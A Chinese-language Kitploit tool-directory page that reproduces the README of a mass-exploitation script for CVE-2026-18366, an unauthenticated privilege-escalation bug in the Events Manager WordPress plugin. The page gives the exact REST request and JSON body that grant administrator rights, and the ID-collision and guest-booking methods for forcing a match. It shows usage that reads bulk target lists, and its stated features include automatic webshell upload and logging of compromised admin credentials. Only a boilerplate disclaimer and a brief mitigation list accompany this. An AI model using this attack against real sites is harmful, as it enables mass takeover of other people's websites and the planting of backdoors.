Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

订阅源联系隐私© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-18366 — Events Manager < 7.4.1 - 未经身份验证的权限提升至管理员 | Kitploit
工具/GitHubGitHub/nxploited/cve-2026-18366
权限提升Web漏洞扫描器漏洞利用Web应用程序漏洞利用信息收集后渗透利用
GitHubnxploited/cve-2026-18366

CVE-2026-18366

Events Manager < 7.4.1 - 未经身份验证的权限提升至管理员

查看仓库
2251个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-18366

Events Manager < 7.4.1 - 未认证权限提升至管理员

CVE CVSS WordPress

Typing SVG


🔗 保持更新

Telegram

获取最新的零日漏洞、漏洞利用与安全研究

Telegram Channel


📋 漏洞概述

属性详情
CVE IDCVE-2026-18366
严重性🔴 严重 (CVSS 9.8)
插件Events Manager for WordPress
受影响版本< 7.4.1
漏洞类型未认证权限提升
攻击向量网络
认证要求无

🔍 技术描述

根本原因分析

漏洞存在于 classes/em-archetypes.php 中的 EM\Archetypes::map_meta_cap。该插件错误地限定了能力映射的范围:

  1. 将任意对象 ID 视为文章 ID
  2. 如果文章是 event 或 location 自定义文章类型(CPT),则会清空 $caps = []
  3. 从不重新为 edit_user、delete_user 或 promote_user 填充能力
  4. 空能力列表 → has_cap() 返回 true,包括对用户 0(访客)

攻击向量

POST|PUT|PATCH  /wp-json/wp/v2/users/{id}
POST            /index.php?rest_route=/wp/v2/users/{id}

Body: {"password":"...","roles":["administrator"]}

条件: {id} 必须与 event 或 location 自定义文章类型(CPT)的 wp_posts.ID 相等。

⚠️ 未认证的 REST 请求不需要 nonce(无登录 Cookie)。

访客预订利用

访客预订(默认 dbem_bookings_anonymous=1)会创建真实的 WP 用户,从而可以强制进行 ID 碰撞。预订 nonce 在活动表单上是公开可用的。


🚀 使用方法

环境要求

pip install aiohttp

快速开始

python CVE-2026-18366.py

脚本将提示输入:

  • list → 目标列表文件路径(默认:list.txt)
  • speed → 并发工作线程数(默认:10)

命令行选项

python CVE-2026-18366.py -l targets.txt -s 20 --timeout 30
选项描述
-l, --list包含目标 URL 的文件的路径
-s, --speed并发工作线程数(1-200)
--timeout请求超时时间(秒,默认:20)

目标列表格式

创建一个 list.txt 文件,每行一个目标:

https://target1.com
https://target2.com/wordpress
http://target3.com
target4.com

📊 输出

控制台输出

[+] [HH:MM:SS] target.com  ADMIN  username:password  uid=X  path
[+] [HH:MM:SS] target.com  SHELL  https://target.com/wp-content/plugins/...

结果文件

成功入侵的目标将保存到 adminS.txt:

https://target.com | username:Nx_admin_@!KSA | uid=X | path=id-collision | ADMIN | shell_url

🔄 利用流程

┌─────────────────────────────────────────────────────────────────┐
│                    CVE-2026-18366 Flow                          │
├─────────────────────────────────────────────────────────────────┤
│                                                                 │
│  ┌──────────┐    ┌─────────────┐    ┌──────────────────────┐   │
│  │  Detect  │ →  │ Collect IDs │ →  │  PATH A: ID Brute    │   │
│  │  Plugin  │    │  (CPT/HTML) │    │  REST /users/{id}    │   │
│  └──────────┘    └─────────────┘    └──────────┬───────────┘   │
│                                                 │               │
│                                          ┌──────▼──────┐        │
│                                          │   Success?  │        │
│                                          └──────┬──────┘        │
│                                       No │      │ Yes           │
│                               ┌──────────▼──────▼──────────┐    │
│                               │                            │    │
│  ┌──────────────────────┐     │    ┌─────────────────┐     │    │
│  │  PATH B: Guest Book  │ ←───┘    │  Login + Verify │     │    │
│  │  Create user until   │          │  Admin Access   │     │    │
│  │  user_id == post_id  │          └────────┬────────┘     │    │
│  └──────────────────────┘                   │              │    │
│                                    ┌────────▼────────┐     │    │
│                                    │  Upload Shell   │     │    │
│                                    │  (Plugin/Theme) │     │    │
│                                    └────────┬────────┘     │    │
│                                             │              │    │
│                                    ┌────────▼────────┐     │    │
│                                    │   Save Results  │     │    │
│                                    │   adminS.txt    │     │    │
│                                    └─────────────────┘     │    │
│                                                            │    │
└────────────────────────────────────────────────────────────────┘

⚙️ 功能特性

  • 异步架构 → 高性能并发扫描
  • 双攻击路径 → ID 碰撞 + 访客预订利用
  • 自动上传 Shell → 插件/主题 WebShell 部署
  • 版本检测 → 自动识别易受攻击的版本
  • 智能用户名枚举 → 多种枚举技术
  • 登录验证 → Cookie + XML-RPC 验证
  • 权限提升 → 自动提升为管理员

📁 文件结构

├── CVE-2026-18366.py    # Main exploit script
├── list.txt             # Target URLs (create this)
├── adminS.txt           # Successful results (auto-created)
└── README.md            # This documentation

⚠️ 免责声明

╔══════════════════════════════════════════════════════════════════╗
║                        LEGAL DISCLAIMER                          ║
╠══════════════════════════════════════════════════════════════════╣
║                                                                  ║
║  This tool is provided for EDUCATIONAL and AUTHORIZED           ║
║  SECURITY TESTING purposes only.                                ║
║                                                                  ║
║  • Only use on systems you own or have explicit permission      ║
║  • Unauthorized access to computer systems is ILLEGAL           ║
║  • The author is NOT responsible for any misuse or damage       ║
║  • By using this tool, you agree to these terms                 ║
║                                                                  ║
║  Use responsibly. Stay ethical. Respect the law.                ║
║                                                                  ║
╚══════════════════════════════════════════════════════════════════╝

🛡️ 缓解措施

如果您是 WordPress 管理员:

  1. 更新 Events Manager 至版本 7.4.1 或更高版本
  2. 审计用户账户是否存在未授权更改
  3. 审查访问日志中是否存在可疑的 REST API 活动
  4. 实施 WAF 规则以过滤恶意请求

👤 作者

Nxploited (Khaled Alenzi)

Telegram


安全研究 • 道德黑客 • 零日漏洞发现

下载工具